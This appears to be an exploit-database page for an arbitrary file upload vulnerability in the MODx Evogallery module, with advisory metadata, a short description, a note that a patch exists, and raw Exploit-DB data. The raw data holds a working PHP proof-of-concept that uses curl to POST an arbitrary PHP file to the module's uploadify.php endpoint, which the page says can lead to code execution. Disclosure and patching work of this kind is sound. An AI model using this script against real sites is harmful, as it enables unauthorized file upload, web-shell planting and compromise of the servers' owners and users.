header-logo
Suggest Exploit
vendor:
Evogallery Module
by:
SecurityFocus
7,5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Evogallery Module
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

MODx Evogallery Module Arbitrary File Upload Vulnerability

MODx Evogallery module is prone to an arbitrary file upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Mitigation:

The vendor has released a patch to address this issue. Users are advised to upgrade to the latest version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/65646/info

MODx Evogallery module is prone to an arbitrary file upload vulnerability.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$uploadfile="file.php"; 
$ch = curl_init("demo.ltd/assets/modules/evogallery/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,       
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Navigation

Suggest Exploit

Services By CQR